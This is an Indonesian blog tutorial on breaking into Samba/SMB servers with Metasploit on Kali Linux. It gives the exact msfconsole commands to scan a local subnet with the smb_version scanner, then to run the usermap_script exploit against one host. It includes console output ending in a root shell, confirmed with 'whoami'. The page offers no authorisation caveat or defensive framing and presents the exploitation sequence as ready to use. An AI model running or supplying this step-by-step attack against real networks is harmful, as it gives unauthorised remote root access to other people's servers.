Kali Linux: Membobol Network Neighbourhood / SAMBA
Sumber: http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/
Lakukan Enumerasi
Ketik di console
msfconsole
Akan keluar kira-kira
Metasploit Park, System Security Interface Version 4.0.5, Alpha E Ready... > access security access: PERMISSION DENIED. > access security grid access: PERMISSION DENIED. > access main security grid access: PERMISSION DENIED....and... YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! Easy phishing: Set up email templates, landing pages and listeners in Metasploit Pro -- learn more on http://rapid7.com/metasploit =[ metasploit v4.11.4-2015071403 ] + -- --=[ 1467 exploits - 840 auxiliary - 232 post ] + -- --=[ 432 payloads - 37 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
yang lebih sopan, KETIK
msfconsole thankyou
Akan keluar
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.4-2015071403 ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
KETIK
use auxiliary/scanner/smb/smb_version show options
Keluar
Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads
KETIK
set RHOSTS 192.168.0.0/24 set THREADS 75 run
Hasilnya
[*] 192.168.0.7:445 could not be identified: Unix (Samba 3.6.3-31a.osstech) [*] Scanned 44 of 256 hosts (17% complete) [*] Scanned 68 of 256 hosts (26% complete) [*] Scanned 78 of 256 hosts (30% complete) [*] 192.168.0.90:445 is running Windows 7 Professional SP1 (build:7601) (name:HP-PC) (domain:WORKGROUP) [*] Scanned 152 of 256 hosts (59% complete) [*] Scanned 153 of 256 hosts (59% complete) [*] 192.168.0.221:445 could not be identified: Unix (Samba 3.0.37) [*] Scanned 156 of 256 hosts (60% complete) [*] Scanned 205 of 256 hosts (80% complete) [*] Scanned 227 of 256 hosts (88% complete) [*] Scanned 231 of 256 hosts (90% complete) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed
KETIK
use exploit/multi/samba/usermap_script show options
Keluar
Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target port Exploit target: Id Name -- ---- 0 Automatic
KETIK
set RHOST 192.168.0.7 exploit
And like magic we have a command shell! Meaning we are in the SAMBA server itself, if we type “ls” without quotes this will list the directory, with this exploit we are in the root folder. Now just to be 100% sure we owned this box, I want you to type “whoami” without quotes and you can see below for yourself the server responded with “root” Good Game Samba Box!
whoami
This concludes the owning Samba Servers blog, I will have more introduction blogs coming soon on the Metasploit framework so stay tuned!